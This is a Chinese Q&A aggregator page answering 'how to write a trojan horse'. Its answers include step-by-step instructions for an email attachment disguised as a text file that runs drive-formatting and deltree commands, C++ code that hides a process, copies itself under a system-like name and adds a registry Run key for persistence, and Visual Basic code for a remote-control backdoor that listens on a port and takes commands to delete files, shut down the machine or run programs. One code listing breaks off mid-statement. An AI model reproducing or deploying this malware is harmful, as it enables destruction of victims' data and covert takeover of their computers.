導航:首頁 > 軟體知識 > 木馬程序怎麼寫

木馬程序怎麼寫

發布時間:2022-10-03 21:59:52

『壹』 木馬程序怎麼編寫

要想編寫木馬程序,你首先知道你自己的IP地址是多少,然後可以讓木馬自動連接你的電腦。

『貳』 誰能教我製作木馬程序 謝謝

1.創建一個只包含一個空格
為了減小文件體積)的文本文件,任意取名。
2.打開{寫字板文檔},將此文件拖放入{寫字板文檔}。也可以點擊記{寫字板
文檔}單欄中的「插入\對象」,彈出「插入對象」對話框,選中「從文件創建」,然後
點擊「瀏覽」按鈕選擇要插入的文件。
3.選中該插入對象的圖標,選擇菜單欄中的「編輯\包對象\編輯包」(如圖1)。在彈
出的「對象包裝程序」對話框中,選擇菜單欄中的「編輯\命令行」,然後輸入如下命令
:start.exe /m format c:/q /autotest /u ,點擊「確定」,此時,內容欄中會顯示
出命令內容。
4.點擊外觀欄中的「插入圖標」按鈕,會彈出一個警告對話框,確認,然後任選一
個圖標。
5.選擇菜單欄中的「編輯\卷標」,為此嵌入對象取一個名稱(會替換原來的文件名
稱)。點擊「文件」菜單中的「更新」,然後關閉此對話框。
6.將剛剛建立的嵌入對象拖放到桌面上。文件的默認名是「碎片」(在2000下的默
認名為」片段」),現在我們把它改成「password01.txt」。打開電子郵件程序將桌面
上的「password01.txt」作為附件發出,或者將含有嵌入對象(帶有惡意命令)的文檔作
為附件發出。
7.當郵件接收者誤將「password01.txt.shs」文件作為「password01.txt」(如前文
所述,「.SHS」擴展名永遠是隱藏的)放心地打開時,或打開文件,點擊文件中的嵌入對
象時觸發惡意命令(彈出DOS運行窗口,執行格式化命令).如果將上面的命令替換為:st
art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 則是將刪除對方硬碟下所有文件(盤符
根據實際情況自定義);如果替換為:start.exe /m deltree /y
c:\windows\system\*.* 則是刪除對方c:\windows\system\目錄底下的所有文件.(當
然大家可以改成其它的命令)
很簡單,這樣一個惡意的攻擊程序被弄出來了!
如果你是新手,建議下載Back office木馬程序
盜號的確很好玩,但是不提倡這個,木馬不用製作直接下載木馬生成器就可以了,不過要小心自己的隱私被他人竊取。

『叄』 木馬是如何編寫的

這個木馬只是個例子在模枋BO,
很簡單是灰鴿子類的遠程式控制制軟體! 編寫思路上一段就是隱藏自己,當有客戶端連接時告訴以方你控制的機器是什麼操作系統!

『肆』 如何來建一個木馬程序

用C++編寫的木馬程序
DLL在程序編制中可作出巨大貢獻,它提供了具共性代碼的復用能力。但是,正如一門高深的武學,若被掌握在正義之俠的手上,便可助其仗義江湖;但若被掌握在邪惡之徒的手上,則必然在江湖上掀起腥風血雨。DLL正是一種這樣的武學。DLL一旦染上了魔性,就不再是正常的DLL程序,而是DLL木馬,一種惡貫滿盈的病毒,令特洛伊一夜之間國破家亡。
DLL木馬的原理
DLL木馬的實現原理是編程者在DLL中包含木馬程序代碼,隨後在目標主機中選擇特定目標進程,以某種方式強行指定該進程調用包含木馬程序的DLL,最終達到侵襲目標系統的目的。
正是DLL程序自身的特點決定了以這種形式載入木馬不僅可行,而且具有良好的隱藏性:

『伍』 怎麼編寫木馬

這個只是惡作劇程序,不是木馬。
其實很簡單嘛,只要終止explorer.exe進程就行了。
這都不需要編程,只要寫個批處理就行。
把:taskkill
/f
/im
Explorer.exe寫到一個文本文檔里,然後把那個文檔的後綴名由.txt改為.bat就行了。

『陸』 木馬程序是怎樣的 怎樣製造一個木馬程序

製造木馬是要用C語言的,自己寫代碼就可以了,不過不建議傳播木馬,自己電腦中毒就更不好了

如果電腦中毒或者中木馬建議快速殺毒

你可以下載一款殺毒軟體殺毒,比如騰訊電腦管家

打開騰訊電腦管家--閃電殺毒--全盤掃描--完成

騰訊電腦管家應用了具有「自學習能力」的自研第二代「鷹眼」引擎,
業界首創將CPU虛擬執行技術運用到殺毒軟體中,

能夠根除頑固病毒、大幅度提升深度查殺能力,
並且大大降低了殺毒軟體對用戶電腦系統資源的佔用率。

同時,沿用「4+1」多引擎架構保證了騰訊電腦管家病毒查殺的穩定性。
誤殺率也極低,深受廣大用戶的認可。

『柒』 簡單的木馬怎麼編寫啊

特洛依木馬這個名詞大家應該不陌生,自從98年「死牛崇拜」黑客小組公布Back Orifice以來,木馬猶如平地上的驚雷, 使在Dos——Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒,終於認識到的網路也有它邪惡的一面,一時間人心惶惶。

我那時在《電腦報》上看到一篇文章,大意是一個菜鳥被人用BO控制了,嚇得整天吃不下飯、睡不著覺、上不了網,到處求救!要知道,木馬(Trojan)的歷史是很悠久的:早在AT&T Unix和BSD Unix十分盛行的年代,木馬是由一些玩程式(主要是C)水平很高的年輕人(主要是老美)用C或Shell語言編寫的,基本是用來竊取登陸主機的口令,以取得更高的許可權。那時木馬的主要方法是誘騙——先修改你的.profile文件,植入木馬;當你登陸時將你敲入的口令字元存入一個文件,用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的,對網路可以說很陌生。直到Win9x橫空出世,尤其是WinNt的普及,大大推動了網路事業的發展的時候,BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬(甚至在Win9x的「關閉程序」對話框可以看到進程)給了當時中國人極大的震撼,它在中國的網路安全方面可以說是一個劃時代的軟體。

自己編寫木馬,聽起來很Cool是不是?!木馬一定是由兩部分組成——伺服器程序(Server)和客戶端程序(Client),伺服器負責打開攻擊的道路,就像一個內奸特務;客戶端負責攻擊目標,兩者需要一定的網路協議來進行通訊(一般是TCP/IP協議)。為了讓大家更好的了解木馬攻擊技術,破除木馬的神秘感,我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬,使大家能更好地防範和查殺各種已知和未知的木馬。

首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi,這里我們選用C++Builder(以下簡稱BCB);VC雖然好,但GUI設計太復雜,為了更好地突出我的例子,集中注意力在木馬的基本原理上,我們選用可視化的BCB;Delphi也不錯,但缺陷是不能繼承已有的資源(如「死牛崇拜」黑客小組公布的BO2000源代碼,是VC編寫的,網上俯拾皆是);VB嘛,談都不談——難道你還給受害者傳一個1兆多的動態鏈接庫——Msvbvm60.dll嗎?
啟動C++Builder 5.0企業版,新建一個工程,添加三個VCL控制項:一個是Internet頁中的Server Socket,另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序,可以對外服務(對攻擊者敞開大門)。Socket最初是在Unix上出現的,後來微軟將它引入了Windows中(包括Win98和WinNt);後兩個控制項的作用是用來使程序具有FTP(File Transfer Protocol文件傳輸協議)和SMTP(Simple Mail Transfer Protocol簡單郵件傳輸協議)功能,大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。

Form窗體是可視的,這當然是不可思議的。不光佔去了大量的空間(光一個Form就有300K之大),而且使軟體可見,根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form,就像Delphi用過程實現的小程序一般只有17K左右那樣。

我們首先應該讓我們的程序能夠隱身。雙擊Form,首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘,其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此,只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程(Service Process)就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有,那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。

首先判斷目標機的操作系統是Win9x還是WinNt:

{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x,不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
//定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
//載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
//得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
//執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
//卸載動態鏈接庫
}
}

這樣就終於可以隱身了(害我敲了這么多代碼!)。為什麼要判斷操作系統呢?因為WinNt中的進程管理器可以對當前進程一覽無余,因此沒必要在WinNt下也使用以上代碼(不過你可以使用其他的方法,這個留到後面再講)。
接著再將自己拷貝一份到%System%目錄下,例如:C:\Windows\System,並修改注冊表,以便啟動時自動載入:

{
char TempPath[MAX_PATH];
//定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
//TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小,得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
//格式化TempPath字元串,使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
//將自己拷貝到%System%目錄下,並改名為Tapi32.exe,偽裝起來
Registry=new TRegistry;
//定義一個TRegistry對象,准備修改注冊表,這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
//設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\
CurrentVersion\\Run",TRUE);
//打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run,如果不存在,就創建之
try
{
//如果以下語句發生異常,跳至catch,以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
//查找是否有「crossbow」字樣的鍵值,並且是否為拷貝的目錄%System%+Tapi32.exe
//如果不是,就寫入以上鍵值和內容
}
catch(...)
{
//如果有錯誤,什麼也不做
}
}

好,FormCreate過程完成了,這樣每次啟動都可以自動載入Tapi32.exe,並且在「關閉程序」對話框中看不見本進程了,木馬的雛形初現。

接著選中ServerSocket控制項,在左邊的Object Inspector中將Active改為true,這樣程序一啟動就打開特定埠,處於伺服器工作狀態。再將Port填入4444,這是木馬的埠號,當然你也可以用別的。但是你要注意不要用1024以下的低端埠,因為這樣不但可能會與基本網路協議使用的埠相沖突,而且很容易被發覺,因此盡量使用1024以上的高端埠(不過也有這樣一種技術,它故意使用特定埠,因為如果引起沖突,Windows也不會報錯 ^_^)。你可以看一看TNMFTP控制項使用的埠,是21號埠,這是FTP協議的專用控制埠(FTP Control Port);同理TNMSMTP的25號埠也是SMTP協議的專用埠。

再選中ServerSocket控制項,點擊Events頁,雙擊OnClientRead事件,敲入以下代碼:

{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
//定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s%2

『捌』 怎樣編寫木馬程序我不用,只想知道

看看這個,是用VB編的木馬程序
1.「特洛伊木馬」有被稱為BO, 是在美國一次黑客技術討論會上由一個黑客組織推出的。它其實是一種客戶機/伺服器程序,其利用的原理就是:在本機直接啟動運行的程序擁有與使用者相同的許可權。因此如果能夠啟動伺服器端(即被攻擊的計算機)的伺服器程序,就可以使用相應的客戶端工具客戶程序直接控制它了。下面來談談如何用VB來實現它。

使用VB建立兩個程序,一個為客戶端程序Client,一個為伺服器端程序systry。
在Client工程中建立一個窗體,載入WinSock控制項,稱為tcpClient,協議選擇TCP,再加入兩個文本框,用以輸入伺服器的IP地址或伺服器名,然後建立一個按鈕,按下之後就可以對連接進行初始化了,代碼如下:

Private Sub cmdConnect_Click()

If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then

MsgBox ("請輸入主機名或主機IP地址。")

Exit Sub

Else

If Len(Text1.Text) > 0 Then

tcpClient.RemoteHost = Text1.Text

Else

tcpClient.RemoteHost = Text2.Text

End If

End If

tcpClient.Connect

Timer1.Enabled = True

End Sub
連接建立之後就可以使用DataArrival事件處理所收到的數據了。
連接建立之後就可以使用DataArrival事件處理所收到的數據了。
在伺服器端systry工程也建立一個窗體,載入WinSock控制項,稱為tcpServer,協議選擇TCP,在Form_Load事件中加入如下代碼:

Private Sub Form_Load()

tcpServer.LocalPort = 1999

tcpServer.Listen

End Sub

准備應答客戶端程序的請求連接,使用ConnectionRequest事件來應答戶端程序的請求,代碼如下:

Private Sub tcpServer_ConnectionRequest

(ByVal requestID As Long)

If tcpServer.State < > sckClosed Then

tcpServer.Close『檢查控制項的 State 屬性是否為關閉的。

End If 』如果不是,在接受新的連接之前先關閉此連接。

tcpServer.Accept requestID

End Sub
這樣在客戶端程序按下了連接按鈕後,伺服器端程序的ConnectionRequest事件被觸發,執行了以上的代碼。如果不出意外,連接就被建立起來了。

2. 建立連接後伺服器端的程序通過DataArrival事件接收客戶機端程序所發的指令運行既定的程序。如:把伺服器端的驅動器名、目錄名、文件名等傳到客戶機端,客戶機端接收後用TreeView控制項以樹狀的形式顯示出來,瀏覽伺服器端文件目錄;強制關閉或重啟伺服器端的計算機;屏蔽任務欄窗口;屏蔽開始菜單;按照客戶機端傳過來的文件名或目錄名,而刪除它;屏蔽熱啟動鍵;運行伺服器端的任何程序;還包括獲取目標計算機屏幕圖象、窗口及進程列表;激活、終止遠端進程;打開、關閉、移動遠端窗口;控制目標計算機滑鼠的移動與動作;交換遠端滑鼠的左右鍵;在目標計算機模擬鍵盤輸入,下載、上裝文件;提取、創建、修改目標計算機系統注冊表關鍵字;在遠端屏幕上顯示消息。DataArrival事件程序如下:

Private Sub tcpServer_DataArrival

(ByVal bytesTotal As Long)

Dim strData As String

Dim i As Long

Dim mKey As String

tcpServer.GetData strData

『接收數據並存入strData

For i = 1 To Len(strData)

『分離strData中的命令

If Mid(strData, i, 1) = "@" Then

mKey = Left(strData, i - 1)

『把命令ID號存入mKey

『把命令參數存入strData

strData = Right(strData, Len(strData) - i)

Exit For

End If

Next i

Select Case Val(mKey)

Case 1

『驅動器名、目錄名、文件名

Case 2

強制關閉伺服器端的計算機

Case 3

強制重啟伺服器端的計算機

Case 4

屏蔽任務欄窗口;

Case 5

屏蔽開始菜單;

Case 6

按照客戶機端傳過來的文件名或目錄名,而刪除它;

Case 7

屏蔽熱啟動鍵;

Case 8

運行伺服器端的任何程序

End Select

End Sub

詳細程序略。
客戶機端用tcpClient.SendData發命令。命令包括命令ID和命令參數,它們用符號「@」隔開。
另外,當客戶機端斷開與伺服器端的來接後,伺服器端應用tcpServer_Close事件,來繼續准備接收客戶機端的請求,其代碼如下:

Private Sub tcpServer_Close()

tcpServer.Close

tcpServer.Listen

End Sub

這就是一個最基本的特洛伊木馬程序,只要你的機器運行了伺服器端程序,那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了,在我的源程序中有一中方法,是修改系統注冊表的方法。

這就是一個最基本的特洛伊木馬程序,只要你的機器運行了伺服器端程序,那別人就可以在千里之外控制你的計算機。至於如何讓伺服器端程序運行就要發揮你的聰明才智了,在我的源程序中有一中方法,是修改系統注冊表的方法。

成功的特洛伊木馬程序要比這個復雜一些,還有程序的隱藏、自動復制、傳播等問題要解決。警告:千萬不要用BO程序破壞別人的系統。

閱讀全文

與木馬程序怎麼寫相關的資料

熱點內容
膏霜產品有哪些 瀏覽:965
中國平均數據多少 瀏覽:247
大同從三醫院去房產交易所怎麼走 瀏覽:870
個人拆遷信息哪個部門能查到 瀏覽:624
農產品電商有哪些商業模式 瀏覽:695
咸陽的家電市場在什麼地方 瀏覽:480
中國擴大進口哪些農產品 瀏覽:38
珠江村菜市場哪個大 瀏覽:413
廣數980tdc程序怎麼復制 瀏覽:890
市場監管局消保是什麼意思 瀏覽:620
手動擋車市場現狀如何還值得買嗎 瀏覽:299
做生鮮肉的代理怎麼樣 瀏覽:736
不開微信怎麼看小程序 瀏覽:834
上海外貿代理怎麼選 瀏覽:369
天津市廂貨交易所在哪裡 瀏覽:195
如何微信信息同步轉播 瀏覽:186
專科的康復治療技術怎麼樣 瀏覽:861
四川哪裡有養魚技術 瀏覽:629
技術登記職稱是什麼意思 瀏覽:36
2k18傳奇經理怎麼開強制交易 瀏覽:775